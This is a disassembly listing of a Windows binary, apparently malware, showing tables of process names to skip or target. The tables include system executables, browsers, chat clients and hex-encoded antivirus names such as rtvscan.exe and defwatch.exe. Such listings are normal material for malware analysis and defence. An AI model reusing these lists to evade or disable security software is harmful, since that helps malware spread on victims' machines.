dd offset aNvdspsch_exe ; "nvdspsch.exe"
dd offset aNvcplui_exe ; "nvcplui.exe"
dd offset aNwiz_exe ; "nwiz.exe"
dd offset aKeystone_exe ; "keystone.exe"
dd offset aHdashcut_exe ; "HDAShCut.exe"
dd offset aAccwiz_exe ; "accwiz.exe"
dd offset aActmovie_exe ; "actmovie.exe"
dd offset aAhui_exe ; "ahui.exe"
dd offset aAlg_exe ; "alg.exe"
dd offset aAppend_exe ; "append.exe"
dd offset aArp_exe ; "arp.exe"
dd offset aAsr_fmt_exe ; "asr_fmt.exe"
dd offset aAsr_ldm_exe ; "asr_ldm.exe"
dd offset aAsr_pfu_exe ; "asr_pfu.exe"
dd offset aAt_exe ; "at.exe"
dd offset aAti2evxx_exe ; "ati2evxx.exe"
dd offset aAti2mdxx_exe ; "Ati2mdxx.exe"
dd offset aAtmadm_exe ; "atmadm.exe"
dd offset aAttrib_exe ; "attrib.exe"
dd offset aAuditusr_exe ; "auditusr.exe"
dd offset aAutochk_exe ; "autochk.exe"
dd offset aAutoconv_exe ; "autoconv.exe"
dd offset aAutofmt_exe ; "autofmt.exe"
dd offset aAutolfn_exe ; "autolfn.exe"
dd offset aBlastcln_exe ; "blastcln.exe"
dd offset aBootcfg_exe ; "bootcfg.exe"
dd offset aBootok_exe ; "bootok.exe"
dd offset aBootvrfy_exe ; "bootvrfy.exe"
dd offset aCacls_exe ; "cacls.exe"
dd offset aCalc_exe ; "calc.exe"
dd offset aCharmap_exe ; "charmap.exe"
dd offset aChcfg_exe ; "ChCfg.exe"
dd offset aChkdsk_exe ; "chkdsk.exe"
dd offset aChkntfs_exe ; "chkntfs.exe"
dd offset aCidaemon_exe ; "cidaemon.exe"
dd offset aCipher_exe ; "cipher.exe"
dd offset aCisvc_exe ; "cisvc.exe"
dd offset aCkcnv_exe ; "ckcnv.exe"
dd offset aCleanmgr_exe ; "cleanmgr.exe"
dd offset aCliconfg_exe ; "cliconfg.exe"
dd offset aClipbrd_exe ; "clipbrd.exe"
dd offset aClipsrv_exe ; "clipsrv.exe"
dd offset aClspack_exe ; "clspack.exe"
dd offset aCmd_exe ; "cmd.exe"
dd offset aCmdl32_exe ; "cmdl32.exe"
dd offset aCmmon32_exe ; "cmmon32.exe"
dd offset aCmstp_exe ; "cmstp.exe"
dd offset aComp_exe ; "comp.exe"
dd offset aCompact_exe ; "compact.exe"
dd offset aConime_exe ; "conime.exe"
dd offset aControl_exe ; "control.exe"
dd offset aConvert_exe ; "convert.exe"
dd offset aCscript_exe ; "cscript.exe"
dd offset aCsrss_exe ; "csrss.exe"
dd offset aCtfmon_exe ; "ctfmon.exe"
dd offset aDcomcnfg_exe ; "dcomcnfg.exe"
dd offset aDdeshare_exe ; "ddeshare.exe"
dd offset aDebug_exe ; "debug.exe"
dd offset aDefrag_exe ; "defrag.exe"
dd offset aDfrgfat_exe ; "dfrgfat.exe"
dd offset aDfrgntfs_exe ; "dfrgntfs.exe"
dd offset aDiantz_exe ; "diantz.exe"
dd offset aDiskpart_exe ; "diskpart.exe"
dd offset aDiskperf_exe ; "diskperf.exe"
dd offset aDllhost_exe ; "dllhost.exe"
dd offset aDllhst3g_exe ; "dllhst3g.exe"
dd offset aDmadmin_exe ; "dmadmin.exe"
dd offset aDmremote_exe ; "dmremote.exe"
dd offset aDoskey_exe ; "doskey.exe"
dd offset aDosx_exe ; "dosx.exe"
dd offset aDplaysvr_exe ; "dplaysvr.exe"
dd offset aDpnsvr_exe ; "dpnsvr.exe"
dd offset aDpvsetup_exe ; "dpvsetup.exe"
dd offset aDriverquery_ex ; "driverquery.exe"
dd offset aDrwatson_exe ; "drwatson.exe"
dd offset aDrwtsn32_exe ; "drwtsn32.exe"
dd offset aDumprep_exe ; "dumprep.exe"
dd offset aDvdplay_exe ; "dvdplay.exe"
dd offset aDvdupgrd_exe ; "dvdupgrd.exe"
dd offset aDwwin_exe ; "dwwin.exe"
dd offset aDxdiag_exe ; "dxdiag.exe"
dd offset aEdlin_exe ; "edlin.exe"
dd offset aEsentutl_exe ; "esentutl.exe"
dd offset aEudcedit_exe ; "eudcedit.exe"
dd offset aEventcreate_ex ; "eventcreate.exe"
dd offset aEventtriggers_ ; "eventtriggers.exe"
dd offset aEventvwr_exe ; "eventvwr.exe"
dd offset aExe2bin_exe ; "exe2bin.exe"
dd offset aExpand_exe ; "expand.exe"
dd offset aExtrac32_exe ; "extrac32.exe"
dd offset aFastopen_exe ; "fastopen.exe"
dd offset aFc_exe ; "fc.exe"
dd offset aFind_exe ; "find.exe"
dd offset aFindstr_exe ; "findstr.exe"
dd offset aFinger_exe ; "finger.exe"
dd offset aFixmapi_exe ; "fixmapi.exe"
dd offset aFltmc_exe ; "fltMc.exe"
dd offset aFontview_exe ; "fontview.exe"
dd offset aForcedos_exe ; "forcedos.exe"
dd offset aFreecell_exe ; "freecell.exe"
dd offset aFsquirt_exe ; "fsquirt.exe"
dd offset aFsutil_exe ; "fsutil.exe"
dd offset aFtp_exe ; "ftp.exe"
dd offset aGb2312_uce ; "gb2312.uce"
dd offset aGdi_exe ; "gdi.exe"
dd offset aGetmac_exe ; "getmac.exe"
dd offset aGpresult_exe ; "gpresult.exe"
dd offset aGpupdate_exe ; "gpupdate.exe"
dd offset aGrpconv_exe ; "grpconv.exe"
dd offset aHelp_exe ; "help.exe"
dd offset aHostname_exe ; "hostname.exe"
dd offset aIe4uinit_exe ; "ie4uinit.exe"
dd offset aIexpress_exe ; "iexpress.exe"
dd offset aImapi_exe ; "imapi.exe"
dd offset aIpconfig_exe ; "ipconfig.exe"
dd offset aIpsec6_exe ; "ipsec6.exe"
dd offset aIpv6_exe ; "ipv6.exe"
dd offset aIpxroute_exe ; "ipxroute.exe"
dd offset aJava_exe ; "java.exe"
dd offset aJavaw_exe ; "javaw.exe"
dd offset aJavaws_exe ; "javaws.exe"
dd offset aJdbgmgr_exe ; "jdbgmgr.exe"
dd offset aJview_exe ; "jview.exe"
dd offset aKrnl386_exe ; "krnl386.exe"
dd offset aLabel_exe ; "label.exe"
dd offset aLights_exe ; "lights.exe"
dd offset aLnkstub_exe ; "lnkstub.exe"
dd offset aLocator_exe ; "locator.exe"
dd offset aLodctr_exe ; "lodctr.exe"
dd offset aLogagent_exe ; "logagent.exe"
dd offset aLogman_exe ; "logman.exe"
dd offset aLogoff_exe ; "logoff.exe"
dd offset aLogonui_exe ; "logonui.exe"
dd offset aLpq_exe ; "lpq.exe"
dd offset aLpr_exe ; "lpr.exe"
dd offset aLsass_exe ; "lsass.exe"
dd offset aMagnify_exe ; "magnify.exe"
dd offset aMakecab_exe ; "makecab.exe"
dd offset aMem_exe ; "mem.exe"
dd offset aMigpwd_exe ; "migpwd.exe"
dd offset aMmc_exe ; "mmc.exe"
dd offset aMnmsrvc_exe ; "mnmsrvc.exe"
dd offset aMobsync_exe ; "mobsync.exe"
dd offset aMountvol_exe ; "mountvol.exe"
dd offset aMplay32_exe ; "mplay32.exe"
dd offset aMpnotify_exe ; "mpnotify.exe"
dd offset aMqbkup_exe ; "mqbkup.exe"
dd offset aMqsvc_exe ; "mqsvc.exe"
dd offset aMqtgsvc_exe ; "mqtgsvc.exe"
dd offset aMrinfo_exe ; "mrinfo.exe"
dd offset aMrt_exe ; "MRT.exe"
dd offset aMscdexnt_exe ; "mscdexnt.exe"
dd offset aMsdtc_exe ; "msdtc.exe"
dd offset aMsg_exe ; "msg.exe"
dd offset aMshearts_exe ; "mshearts.exe"
dd offset aMshta_exe ; "mshta.exe"
dd offset aMsiexec_exe ; "msiexec.exe"
dd offset aMspaint_exe ; "mspaint.exe"
dd offset aMsswchx_exe ; "msswchx.exe"
dd offset aMstinit_exe ; "mstinit.exe"
dd offset aMstsc_exe ; "mstsc.exe"
dd offset aNarrator_exe ; "narrator.exe"
dd offset aNbtstat_exe ; "nbtstat.exe"
dd offset aNddeapir_exe ; "nddeapir.exe"
dd offset aNerocheck_exe ; "NeroCheck.exe"
dd offset aNet_exe ; "net.exe"
dd offset aNet1_exe ; "net1.exe"
dd offset aNetdde_exe ; "netdde.exe"
dd offset aNetsetup_exe ; "netsetup.exe"
dd offset aNetsh_exe ; "netsh.exe"
dd offset aNetstat_exe ; "netstat.exe"
dd offset aNlsfunc_exe ; "nlsfunc.exe"
dd offset aNotepad_exe_0 ; "notepad.exe"
dd offset aNslookup_exe ; "nslookup.exe"
dd offset aNtbackup_exe ; "ntbackup.exe"
dd offset aNtkrnlpa_exe ; "ntkrnlpa.exe"
dd offset aNtoskrnl_exe ; "ntoskrnl.exe"
dd offset aNtsd_exe ; "ntsd.exe"
dd offset aNtvdm_exe ; "ntvdm.exe"
dd offset aNw16_exe ; "nw16.exe"
dd offset aNwscript_exe ; "nwscript.exe"
dd offset aOdbcad32_exe ; "odbcad32.exe"
dd offset aOdbcconf_exe ; "odbcconf.exe"
dd offset aOpenfiles_exe ; "openfiles.exe"
dd offset aOsk_exe ; "osk.exe"
dd offset aOsuninst_exe ; "osuninst.exe"
dd offset aPackager_exe ; "packager.exe"
dd offset aPathping_exe ; "pathping.exe"
dd offset aPentnt_exe ; "pentnt.exe"
dd offset aPerfmon_exe ; "perfmon.exe"
dd offset aPing_exe ; "ping.exe"
dd offset aPing6_exe ; "ping6.exe"
dd offset aPowercfg_exe ; "powercfg.exe"
dd offset aPrint_exe ; "print.exe"
dd offset aProgman_exe ; "progman.exe"
dd offset aProquota_exe ; "proquota.exe"
dd offset aProxycfg_exe ; "proxycfg.exe"
dd offset aQappsrv_exe ; "qappsrv.exe"
dd offset aQprocess_exe ; "qprocess.exe"
dd offset aQwinsta_exe ; "qwinsta.exe"
dd offset aRasautou_exe ; "rasautou.exe"
dd offset aRasdial_exe ; "rasdial.exe"
dd offset aRasphone_exe ; "rasphone.exe"
dd offset aRcimlby_exe ; "rcimlby.exe"
dd offset aRcp_exe ; "rcp.exe"
dd offset aRdpclip_exe ; "rdpclip.exe"
dd offset aRdsaddin_exe ; "rdsaddin.exe"
dd offset aRdshost_exe ; "rdshost.exe"
dd offset aRecover_exe ; "recover.exe"
dd offset aRedir_exe ; "redir.exe"
dd offset aReg_exe ; "reg.exe"
dd offset aRegcladm_exe ; "REGCLADM.EXE"
dd offset aRegedt32_exe ; "regedt32.exe"
dd offset aRegini_exe ; "regini.exe"
dd offset aRegsvr32_exe ; "regsvr32.exe"
dd offset aRegwiz_exe ; "regwiz.exe"
dd offset aRelog_exe ; "relog.exe"
dd offset aReplace_exe ; "replace.exe"
dd offset aReset_exe ; "reset.exe"
dd offset aRexec_exe ; "rexec.exe"
dd offset aRoute_exe ; "route.exe"
dd offset aRoutemon_exe ; "routemon.exe"
dd offset aRsh_exe ; "rsh.exe"
dd offset aRsm_exe ; "rsm.exe"
dd offset aRsmsink_exe ; "rsmsink.exe"
dd offset aRsmui_exe ; "rsmui.exe"
dd offset aRsnotify_exe ; "rsnotify.exe"
dd offset aRsopprov_exe ; "rsopprov.exe"
dd offset aRsvp_exe ; "rsvp.exe"
dd offset aRtcshare_exe ; "rtcshare.exe"
dd offset aRtlcpl_exe ; "RTLCPL.EXE"
dd offset aRunas_exe ; "runas.exe"
dd offset aRundll32_exe ; "rundll32.exe"
dd offset aRunonce_exe ; "runonce.exe"
dd offset aRwinsta_exe ; "rwinsta.exe"
dd offset aSavedump_exe ; "savedump.exe"
dd offset aSc_exe ; "sc.exe"
dd offset aScardsvr_exe ; "scardsvr.exe"
dd offset aSchtasks_exe ; "schtasks.exe"
dd offset aSdbinst_exe ; "sdbinst.exe"
dd offset aSecedit_exe ; "secedit.exe"
dd offset aServices_exe ; "services.exe"
dd offset aSessmgr_exe ; "sessmgr.exe"
dd offset aSethc_exe ; "sethc.exe"
dd offset aSetup_exe ; "setup.exe"
dd offset aSetver_exe ; "setver.exe"
dd offset aSfc_exe ; "sfc.exe"
dd offset aShadow_exe ; "shadow.exe"
dd offset aShare_exe ; "share.exe"
dd offset aShmgrate_exe ; "shmgrate.exe"
dd offset aShrpubw_exe ; "shrpubw.exe"
dd offset aShutdown_exe ; "shutdown.exe"
dd offset aSigverif_exe ; "sigverif.exe"
dd offset aSkeys_exe ; "skeys.exe"
dd offset aSmbinst_exe ; "smbinst.exe"
dd offset aSmlogsvc_exe ; "smlogsvc.exe"
dd offset aSmss_exe ; "smss.exe"
dd offset aSndrec32_exe ; "sndrec32.exe"
dd offset aSndvol32_exe ; "sndvol32.exe"
dd offset aSol_exe ; "sol.exe"
dd offset aSort_exe ; "sort.exe"
dd offset aSpider_exe ; "spider.exe"
dd offset aSpiisupd_exe ; "spiisupd.exe"
dd offset aSpnpinst_exe ; "spnpinst.exe"
dd offset aSpoolsv_exe ; "spoolsv.exe"
dd offset aSprestrt_exe ; "sprestrt.exe"
dd offset aSpupdsvc_exe ; "spupdsvc.exe"
dd offset aStimon_exe ; "stimon.exe"
dd offset aSubrange_uce ; "subrange.uce"
dd offset aSubst_exe ; "subst.exe"
dd offset aSvchost_exe ; "svchost.exe"
dd offset aSyncapp_exe ; "syncapp.exe"
dd offset aSysedit_exe ; "sysedit.exe"
dd offset aSyskey_exe ; "syskey.exe"
dd offset aSysocmgr_exe ; "sysocmgr.exe"
dd offset aSysteminfo_exe ; "systeminfo.exe"
dd offset aSystray_exe ; "systray.exe"
dd offset aTaskkill_exe ; "taskkill.exe"
dd offset aTasklist_exe ; "tasklist.exe"
dd offset aTaskman_exe_0 ; "taskman.exe"
dd offset aTaskmgr_exe ; "taskmgr.exe"
dd offset aTcmsetup_exe ; "tcmsetup.exe"
dd offset aTcpsvcs_exe ; "tcpsvcs.exe"
dd offset aTelnet_exe ; "telnet.exe"
dd offset aTftp_exe ; "tftp.exe"
dd offset aTlntadmn_exe ; "tlntadmn.exe"
dd offset aTlntsess_exe ; "tlntsess.exe"
dd offset aTlntsvr_exe ; "tlntsvr.exe"
dd offset aTourstart_exe ; "tourstart.exe"
dd offset aTracerpt_exe ; "tracerpt.exe"
dd offset aTracert_exe ; "tracert.exe"
dd offset aTracert6_exe ; "tracert6.exe"
dd offset aTscon_exe ; "tscon.exe"
dd offset aTscupgrd_exe ; "tscupgrd.exe"
dd offset aTsdiscon_exe ; "tsdiscon.exe"
dd offset aTskill_exe ; "tskill.exe"
dd offset aTsshutdn_exe ; "tsshutdn.exe"
dd offset aTwunk_16_exe ; "twunk_16.exe"
dd offset aTwunk_32_exe ; "twunk_32.exe"
dd offset aTypeperf_exe ; "typeperf.exe"
dd offset aUnlodctr_exe ; "unlodctr.exe"
dd offset aUpnpcont_exe ; "upnpcont.exe"
dd offset aUps_exe ; "ups.exe"
dd offset aUser_exe ; "user.exe"
dd offset aUserinit_exe ; "userinit.exe"
dd offset aUsrmlnka_exe ; "usrmlnka.exe"
dd offset aUsrprbda_exe ; "usrprbda.exe"
dd offset aUsrshuta_exe ; "usrshuta.exe"
dd offset aUtilman_exe ; "utilman.exe"
dd offset aVerclsid_exe ; "verclsid.exe"
dd offset aVerifier_exe ; "verifier.exe"
dd offset aViral_exe ; "viral.exe"
dd offset aVssadmin_exe ; "vssadmin.exe"
dd offset aVssvc_exe ; "vssvc.exe"
dd offset aVwipxspx_exe ; "vwipxspx.exe"
dd offset aW32tm_exe ; "w32tm.exe"
dd offset aWextract_exe ; "wextract.exe"
dd offset aWiaacmgr_exe ; "wiaacmgr.exe"
dd offset aWinchat_exe ; "winchat.exe"
dd offset aWindbver_exe ; "WINDBVER.EXE"
dd offset aWinhlp32_exe ; "winhlp32.exe"
dd offset aWinmine_exe ; "winmine.exe"
dd offset aWinmsd_exe ; "winmsd.exe"
dd offset aWinspool_exe ; "winspool.exe"
dd offset aWinver_exe ; "winver.exe"
dd offset aWjview_exe ; "wjview.exe"
dd offset aWowdeb_exe ; "wowdeb.exe"
dd offset aWowexec_exe ; "wowexec.exe"
dd offset aWpabaln_exe ; "wpabaln.exe"
dd offset aWpnpinst_exe ; "wpnpinst.exe"
dd offset aWrite_exe ; "write.exe"
dd offset aWscntfy_exe ; "wscntfy.exe"
dd offset aWscript_exe ; "wscript.exe"
dd offset aWuauclt_exe ; "wuauclt.exe"
dd offset aWuauclt1_exe ; "wuauclt1.exe"
dd offset aWupdmgr_exe ; "wupdmgr.exe"
dd offset aXcopy_exe ; "xcopy.exe"
dd offset aAcdsee_scr ; "ACDSee.scr"
dd offset aLogon_scr ; "logon.scr"
dd offset aScrnsave_scr ; "scrnsave.scr"
dd offset aSeismosaver_sc ; "SeismoSaver.scr"
dd offset aSs3dfo_scr ; "ss3dfo.scr"
dd offset aSsbezier_scr ; "ssbezier.scr"
dd offset aSsflwbox_scr ; "ssflwbox.scr"
dd offset aSsmarque_scr ; "ssmarque.scr"
dd offset aSsmypics_scr ; "ssmypics.scr"
dd offset aSsmyst_scr ; "ssmyst.scr"
dd offset aSspipes_scr ; "sspipes.scr"
dd offset aSsstars_scr ; "ssstars.scr"
dd offset aSstext3d_scr ; "sstext3d.scr"
dd offset aSystem_2 ; "System"
dd offset aDevldr32_exe ; "devldr32.exe"
dd offset aInternat_exe ; "internat.exe"
dd offset aAti2evxx_exe ; "ati2evxx.exe"
dd offset aWudfhost_exe ; "WUDFHost.exe"
dd offset aPenservice_exe ; "penservice.exe"
dd offset aWmiexe_exe ; "wmiexe.exe"
dd offset aWinmgmt_exe ; "winmgmt.exe"
dd offset aWercon_exe ; "wercon.exe"
dd offset aTaskeng_exe ; "taskeng.exe"
dd offset aHkcmd_exe ; "hkcmd.exe"
dd offset aHotkey_exe ; "hotkey.exe"
dd offset aJusched_exe ; "jusched.exe"
dd offset aPoint32_exe ; "point32.exe"
dd offset aQttask_exe ; "qttask.exe"
dd offset aWisptis_exe ; "wisptis.exe"
dd offset aCrypserv_exe ; "crypserv.exe"
dd offset aInetinfo_exe ; "inetinfo.exe"
dd offset aIgfxpers_exe ; "igfxpers.exe"
dd offset aIgfxtray_exe ; "igfxtray.exe"
dd offset aPctspk_exe ; "pctspk.exe"
dd offset aMstask_exe ; "mstask.exe"
dd offset aSmagent_exe ; "smagent.exe"
dd offset aNmssvc_exe ; "nmssvc.exe"
dd offset aHpsysdrv_exe ; "hpsysdrv.exe"
dd offset aHpcmpmgr_exe ; "hpcmpmgr.exe"
dd offset aNhksrv_exe ; "nhksrv.exe"
dd offset aHpzipm12_exe ; "HPZipm12.exe"
dd offset aCli_exe ; "cli.exe"
dd offset aTphkmgr_exe ; "TPHKMGR.exe"
dd offset aSmax4pnp_exe ; "smax4pnp.exe"
dd offset aLoadqm_exe ; "loadqm.exe"
dd offset aLexbces_exe ; "lexbces.exe"
dd offset aDwm_exe ; "dwm.exe"
dd offset aLsm_exe ; "lsm.exe"
dd offset aMdm_exe ; "mdm.exe"
dd offset aMssearch_exe ; "mssearch.exe"
dd offset aRegsvc_exe ; "regsvc.exe"
dd offset aSdclt_exe ; "sdclt.exe"
dd offset aSlsvc_exe ; "slsvc.exe"
align 10h
off_43F640 dd offset loc_439030 ; DATA XREF: sub_417A90:loc_417B83�r
dd offset aWmsoft_exe ; "wmsoft*.exe"
dd offset aAlcmtr_exe ; "ALCMTR.EXE"
dd offset aAlcwzrd_exe ; "ALCWZRD.EXE"
dd offset aHdashcut_exe ; "HDAShCut.exe"
dd offset aRthdcpl_exe ; "RTHDCPL.EXE"
dd offset aRtlcpl_exe ; "RTLCPL.EXE"
dd offset aMiccal_exe ; "MicCal.exe"
dd offset aRtlupd_exe ; "RtlUpd.exe"
dd offset aAlcrmv_exe ; "alcrmv.exe"
dd offset aAlcupd_exe ; "alcupd.exe"
dd offset aExplorer_exe_0 ; "explorer.exe"
dd offset aHh_exe ; "hh.exe"
dd offset aIsuninst_exe ; "IsUninst.exe"
dd offset aIun6002_exe ; "iun6002.exe"
dd offset aNotepad_exe ; "NOTEPAD.EXE"
dd offset aRegedit_exe ; "regedit.exe"
dd offset aRegtlib_exe ; "REGTLIB.EXE"
dd offset aSetdebug_exe ; "setdebug.exe"
dd offset aSetup1_exe ; "Setup1.exe"
dd offset aSoundman_exe ; "SOUNDMAN.EXE"
dd offset aSt6unst_exe ; "ST6UNST.EXE"
dd offset aTaskman_exe ; "TASKMAN.EXE"
dd offset aTwunk_16_exe ; "twunk_16.exe"
dd offset aTwunk_32_exe ; "twunk_32.exe"
dd offset aWinhelp_exe ; "winhelp.exe"
dd offset aWinhlp32_exe ; "winhlp32.exe"
dd offset aSystem_2 ; "System"
dd offset aHtpatch_exe ; "htpatch.exe"
dd offset aPoint32_exe ; "point32.exe"
dd offset aSmagent_exe ; "smagent.exe"
dd offset aSmax4pnp_exe ; "smax4pnp.exe"
dd offset aSound_exe ; "*sound*.exe"
align 8
off_43F6C8 dd offset loc_439030 ; DATA XREF: sub_417A90:loc_417BC0�r
dd offset aWmsoft_exe ; "wmsoft*.exe"
dd offset aWmpcodecs_exe ; "wmpcodecs.exe"
dd offset aMsxml32_exe ; "msxml32.exe"
dd offset aMsnmsgr_exe ; "msnmsgr.exe"
dd offset aWmiprvse_exe ; "wmiprvse.exe"
dd offset aMsmsgs_exe ; "msmsgs.exe"
dd offset aMirc_exe ; "mirc.exe"
dd offset aXchat_exe ; "xchat.exe"
dd offset aFirefox_exe ; "firefox.exe"
dd offset aThunderbird_ex ; "thunderbird.exe"
dd offset dword_43F8D0
dd offset dword_43F8C4
dd offset dword_43F8B4
dd offset dword_43F8A8
dd offset dword_43F89C
dd offset dword_43F894
dd offset dword_43F884
dd offset dword_43F874
dd offset aIexplore_exe ; "iexplore.exe"
dd offset dword_43F868
dd offset dword_43F85C
dd offset dword_43F84C
dd offset dword_43F83C
dd offset aNotepad_exe_0 ; "notepad.exe"
dd offset aWvsscheduler_e ; "WVSScheduler.exe"
dd offset dword_43F81C
dd offset dword_43F80C
dd offset dword_43F7FC
dd offset dword_43F7F0
dd offset dword_43F7E4
dd offset loc_43F7DB+1
; ---------------------------------------------------------------------------
sal bh, 1
inc ebx
add ah, al
test dword ptr [ebx+0], offset aApache_exe ; "apache.exe"
lodsb
test dword ptr [ebx+0], 43F7A4h
xchg eax, esp
loc_43F75D: ; CODE XREF: .text:0043F764�j
test dword ptr [ebx+0], offset dword_43F788
jl short loc_43F75D
inc ebx
add [edi+esi*8+43h], ch
add [edi+6Dh], dh
jo short near ptr loc_43F7DB+1
popa
jns short loc_43F7D8
jb short loc_43F7A3
; ---------------------------------------------------------------------------
db 65h, 78h, 65h
dd 0
dd 726E6977h, 652E7261h, 6578h
dword_43F788 dd 69766F6Dh, 2E6B6D65h, 657865h, 61677661h, 7276736Dh
; DATA XREF: .text:loc_43F75D�o
dd 6578652Eh
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_43F7A3: ; CODE XREF: .text:0043F773�j
add [ecx+76h], ah
arpl [bp+di+0], sp
; ---------------------------------------------------------------------------
dw 0
aAvgupsvc db 'avgupsvc',0
align 4
aApache_exe db 'apache.exe',0 ; DATA XREF: .text:0043F74D�o
align 4
aNmap_exe db 'nmap.exe',0
align 10h
dd 74747570h, 78652E79h
; ---------------------------------------------------------------------------
loc_43F7D8: ; CODE XREF: .text:0043F771�j
add gs:[eax], al
loc_43F7DB: ; CODE XREF: .text:0043F76E�j
; DATA XREF: .text:0043F744�o
add [edx], ch
db 2Eh
jnb short loc_43F843
jb short $+2
; ---------------------------------------------------------------------------
dw 0
dword_43F7E4 dd 7A6E6977h, 652E7069h, 6578hdword_43F7F0 dd 65747563h, 2E707466h, 657865hdword_43F7FC dd 73616C66h, 70786668h, 6578652Eh, 0dword_43F80C dd 54616554h, 72656D69h, 6578652Eh, 0dword_43F81C dd 7253534Ch, 652E6376h, 6578haWvsscheduler_e db 'WVSScheduler.exe',0 ; DATA XREF: .text:0043F72C�o
align 4
dword_43F83C dd 6E706D77h db 73h, 63h, 66h
; ---------------------------------------------------------------------------
loc_43F843: ; CODE XREF: .text:0043F7DD�j
db 67h, 2Eh, 65h
js near ptr 0F8ADh
; ---------------------------------------------------------------------------
dd 0
dword_43F84C dd 4F545541h, 43455845h, 5441422Eh, 0dword_43F85C dd 61657473h, 78652E6Dh, 65hdword_43F868 dd 64726F77h, 2E646170h, 657865hdword_43F874 dd 65736363h, 72676D74h, 6578652Eh, 0dword_43F884 dd 76656363h, 72676D74h, 6578652Eh, 0dword_43F894 dd 2E6D6961h, 657865hdword_43F89C dd 70616363h, 78652E70h, 65hdword_43F8A8 dd 73767472h, 2E6E6163h, 657865hdword_43F8B4 dd 77666564h, 68637461h, 6578652Eh, 0dword_43F8C4 dd 656F736Dh, 6578652Eh, 0dword_43F8D0 dd 6D69736Dh, 78652E6Eh, 65haThunderbird_ex db 'thunderbird.exe',0 ; DATA XREF: .text:0043F6F0�o
aFirefox_exe db 'firefox.exe',0 ; DATA XREF: .text:0043F6EC�o
aXchat_exe db 'xchat.exe',0 ; DATA XREF: .text:0043F6E8�o
align 4
aMirc_exe db 'mirc.exe',0 ; DATA XREF: .text:0043F6E4�o
align 10h
aMsmsgs_exe db 'msmsgs.exe',0 ; DATA XREF: .text:0043F6E0�o
align 4
aWmiprvse_exe db 'wmiprvse.exe',0 ; DATA XREF: .text:0043F6DC�o
align 4
aMsnmsgr_exe db 'msnmsgr.exe',0 ; DATA XREF: .text:0043F6D8�o
aMsxml32_exe db 'msxml32.exe',0 ; DATA XREF: .text:0043F6D4�o
aWmpcodecs_exe db 'wmpcodecs.exe',0 ; DATA XREF: .text:0043F6D0�o
align 4
aSound_exe db '*sound*.exe',0 ; DATA XREF: .text:0043F6C0�o
aHtpatch_exe db 'htpatch.exe',0 ; DATA XREF: .text:0043F6B0�o
aWinhelp_exe db 'winhelp.exe',0 ; DATA XREF: .text:0043F6A4�o
aTaskman_exe db 'TASKMAN.EXE',0 ; DATA XREF: .text:0043F698�o
aSt6unst_exe db 'ST6UNST.EXE',0 ; DATA XREF: .text:0043F694�o
aSoundman_exe db 'SOUNDMAN.EXE',0 ; DATA XREF: .text:0043F690�o
align 10h
aSetup1_exe db 'Setup1.exe',0 ; DATA XREF: .text:0043F68C�o
align 4
aSetdebug_exe db 'setdebug.exe',0 ; DATA XREF: .text:0043F688�o
align 4
aRegtlib_exe db 'REGTLIB.EXE',0 ; DATA XREF: .text:0043F684�o
aRegedit_exe db 'regedit.exe',0 ; DATA XREF: .text:0043F680�o
aNotepad_exe db 'NOTEPAD.EXE',0 ; DATA XREF: .text:0043F67C�o
aIun6002_exe db 'iun6002.exe',0 ; DATA XREF: .text:0043F678�o
aIsuninst_exe db 'IsUninst.exe',0 ; DATA XREF: .text:0043F674�o
align 4
aHh_exe db 'hh.exe',0 ; DATA XREF: .text:0043F670�o
align 4
aExplorer_exe_0 db 'explorer.exe',0 ; DATA XREF: sub_41F455+85�o
; .text:0043F66C�o
align 4
aAlcupd_exe db 'alcupd.exe',0 ; DATA XREF: .text:0043F668�o
align 10h
aAlcrmv_exe db 'alcrmv.exe',0 ; DATA XREF: .text:0043F664�o
align 4
aRtlupd_exe db 'RtlUpd.exe',0 ; DATA XREF: .text:0043F660�o
align 4
aMiccal_exe db 'MicCal.exe',0 ; DATA XREF: .text:0043F65C�o
align 4
aRthdcpl_exe db 'RTHDCPL.EXE',0 ; DATA XREF: .text:0043F654�o
aAlcwzrd_exe db 'ALCWZRD.EXE',0 ; DATA XREF: .text:0043F64C�o
aAlcmtr_exe db 'ALCMTR.EXE',0 ; DATA XREF: .text:0043F648�o
align 4
aSlsvc_exe db 'slsvc.exe',0 ; DATA XREF: .text:0043F638�o
align 4
aSdclt_exe db 'sdclt.exe',0 ; DATA XREF: .text:0043F634�o
align 10h
aRegsvc_exe db 'regsvc.exe',0 ; DATA XREF: .text:0043F630�o
align 4
aMssearch_exe db 'mssearch.exe',0 ; DATA XREF: .text:0043F62C�o
align 4
aMdm_exe db 'mdm.exe',0 ; DATA XREF: .text:0043F628�o
aLsm_exe db 'lsm.exe',0 ; DATA XREF: .text:0043F624�o
aDwm_exe db 'dwm.exe',0 ; DATA XREF: .text:0043F620�o
aLexbces_exe db 'lexbces.exe',0 ; DATA XREF: .text:0043F61C�o
aLoadqm_exe db 'loadqm.exe',0 ; DATA XREF: .text:0043F618�o
align 4
aSmax4pnp_exe db 'smax4pnp.exe',0 ; DATA XREF: .text:0043F614�o
; .text:0043F6BC�o
align 4
aTphkmgr_exe db 'TPHKMGR.exe',0 ; DATA XREF: .text:0043F610�o
aCli_exe db 'cli.exe',0 ; DATA XREF: .text:0043F60C�o
aHpzipm12_exe db 'HPZipm12.exe',0 ; DATA XREF: .text:0043F608�o
align 10h
aNhksrv_exe db 'nhksrv.exe',0 ; DATA XREF: .text:0043F604�o
align 4
aHpcmpmgr_exe db 'hpcmpmgr.exe',0 ; DATA XREF: .text:0043F600�o
align 4
aHpsysdrv_exe db 'hpsysdrv.exe',0 ; DATA XREF: .text:0043F5FC�o
align 4
aNmssvc_exe db 'nmssvc.exe',0 ; DATA XREF: .text:0043F5F8�o
align 4
aSmagent_exe db 'smagent.exe',0 ; DATA XREF: .text:0043F5F4�o
; .text:0043F6B8�o
aMstask_exe db 'mstask.exe',0 ; DATA XREF: .text:0043F5F0�o
align 10h
aPctspk_exe db 'pctspk.exe',0 ; DATA XREF: .text:0043F5EC�o
align 4
aIgfxtray_exe db 'igfxtray.exe',0 ; DATA XREF: .text:0043F5E8�o
align 4
aIgfxpers_exe db 'igfxpers.exe',0 ; DATA XREF: .text:0043F5E4�o
align 4
aInetinfo_exe db 'inetinfo.exe',0 ; DATA XREF: .text:0043F5E0�o
align 4
aCrypserv_exe db 'crypserv.exe',0 ; DATA XREF: .text:0043F5DC�o
align 4
aWisptis_exe db 'wisptis.exe',0 ; DATA XREF: .text:0043F5D8�o
aQttask_exe db 'qttask.exe',0 ; DATA XREF: .text:0043F5D4�o
align 4
